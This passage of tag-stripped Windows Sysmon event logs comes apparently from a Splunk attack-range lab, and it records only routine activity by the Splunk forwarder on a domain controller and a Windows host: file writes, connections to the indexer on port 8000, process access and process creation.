AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49587-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000223002Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:56.527{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=230B76AE4E166FF5AC68EAFF95BA7763,SHA256=82F757128AF7DAC3BE4165EA38B0252B2208F74ACD6EF32FB459C392F4CB32A8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299091Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:25:56.731{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A919C65D0FD2DA5132C5CBEC7F4DA858,SHA256=C79D6EA7C23849B1BB19D4F309BB8CB2C15002222057180B2E07B1D4273FB1F5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223003Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:57.762{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E0474362D93D76F65276A022F5C94F65,SHA256=67D9BDAAA91810A7F517DB88332B7C6DC1A04788AF2AA25E0483377654A29AD5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299092Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:25:57.746{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=61B1B3109F71337BF86A12F5745CDAC7,SHA256=18888BCA3FB2AFDAB2836FC56A6B292991C4156DFE962F5E81BD474F273C9D59,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223004Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:58.996{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9384DB88E4A6D8E25F71C302BD3726E7,SHA256=4202C19EE6017DDDBDABBD0B37CBE68F0BCB000B8136A2B14B8D15C1C3AA04E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299093Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:25:58.761{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D02F95D1035070057635AF7EECFB3ABE,SHA256=7625728183B99BD4CC98EFA741F8B136C375A5C8835510850309C83489EBD2BD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299094Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:25:59.776{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AF63E00690698F056EA363D7B137029C,SHA256=EBBD6649DD6A4E2F2C69173674B080E7CCE6D5EE5A3CF52B74DB0ED38420AE82,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299095Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:00.794{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3FA9B17A0FC820E0022D7D571FC3019B,SHA256=7BA2C8EB41B370F9D452E38E18E88FB3340F99EF93DF14065801785A7A4A0D62,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223005Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:00.012{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6A66AD638E9FC9CCCADEF8D0097F0937,SHA256=70E819D3F24735268B86716502DAE2C112ACF44A2707C6DC5B0F58F2A47C6DFA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299105Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:01.848{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D51D4BF9BB3EEED5E60B83E9F2143283,SHA256=B9C4ACD1596A3C29B2A27C09FE71853BC3ABE2C3A2253E46BE4159386DBDB411,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000223007Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:58.702{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51754-false10.0.1.12-8000- 23542300x8000000000000000223006Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:01.027{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1C01AC6D371899E4EB81EBDD32B1C55F,SHA256=5543B6815AF810A85CC791FBE9BDE60E7B74BEB983156DD5E6114078B036915B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000299104Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:01.459{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-19C9-6216-6F07-000000003802}3164C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299103Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:01.459{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299102Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:01.459{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299101Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:01.459{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299100Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:01.459{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299099Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:01.459{C8EA50B7-F11C-6215-0500-000000003802}412528C:\Windows\system32\csrss.exe{C8EA50B7-19C9-6216-6F07-000000003802}3164C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000299098Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:01.459{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-19C9-6216-6F07-000000003802}3164C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000299097Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:01.461{C8EA50B7-19C9-6216-6F07-000000003802}3164C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000299096Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:25:58.592{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49588-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000299115Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:02.880{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4FA43C9E58F496C53F4F2279C590685F,SHA256=E9EDD02529773D9461DC9D5194660C0796B450D6B48BAB7EEA46F76F210E2C32,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223008Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:02.199{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0E4E92F76BC4D3AF7D7DE1251C51A2BD,SHA256=48887D15CD8FED4ED0394BB0766017C468B50A120C213486B320BEEE77E4A141,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000299114Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:02.594{C8EA50B7-19CA-6216-7007-000000003802}41087124C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299113Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:02.326{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-19CA-6216-7007-000000003802}4108C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299112Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:02.326{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299111Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:02.326{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299110Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:02.326{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299109Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:02.326{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299108Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:02.326{C8EA50B7-F11C-6215-0500-000000003802}412368C:\Windows\system32\csrss.exe{C8EA50B7-19CA-6216-7007-000000003802}4108C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000299107Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:02.326{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-19CA-6216-7007-000000003802}4108C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000299106Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:02.327{C8EA50B7-19CA-6216-7007-000000003802}4108C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000299124Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:03.926{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7BBF9BD6FFB17092B4595147C402D8F0,SHA256=F57B7D607F42158A1E245C31FF700F81A160EDF2469D0574B620A9A4FB3B28F4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223009Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:03.215{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4C00A7646DD2A968E0F2022F9A4F5151,SHA256=82CF00F3E3FE97B5A1E61A8C54B024804C0E1462E719D73FFE8D15E4A3E08051,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000299123Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:03.663{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-19CB-6216-7107-000000003802}6964C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299122Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 